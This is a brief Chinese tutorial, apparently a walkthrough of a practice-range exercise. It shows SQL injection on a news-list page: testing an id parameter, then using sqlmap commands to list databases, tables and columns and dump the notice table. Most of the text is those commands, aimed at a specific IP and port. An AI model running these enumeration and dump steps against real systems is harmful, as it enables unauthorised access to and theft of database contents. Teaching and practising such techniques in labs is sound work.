需要的工具 sqlmap 瀏覽器
判斷是否可以進行sql注入
發現登錄下面滾動的字可以點擊
在網站id=1後面拼接+1
看網頁是否有變化
發現網頁有了變化 說明可以進行sql注入
打開sqlmap命令行 輸入命名:sqlmap.py -u http://219.153.49.228:49627/new_list.php?id=1 --dbs 回車
發現5個可注入的數據庫
輸入命令 sqlmap.py -u http://219.153.49.228:49627/new_list.php?id=1 -D mozhe_Discuz_StormGroup --tables 回車
mozhe_Discuz_StormGroup --tables是指定庫列出所有表
輸入命令:sqlmap.py -u http://219.153.49.228:49627/new_list.php?id=1 -D
mozhe_Discuz_StormGroup -T notice --columns 回車
notice --columns指出庫名錶名列出所有字段
輸出sqlmap.py -u http://219.153.49.228:49627/new_list.php?id=1 -D
mozhe_Discuz_StormGroup -T notice -C time,content,id,title --dump 回車
notice -C time,content,id,title --dump打印出你所要的指定字段
sql注入比較複雜 這只是sql注入的簡單操作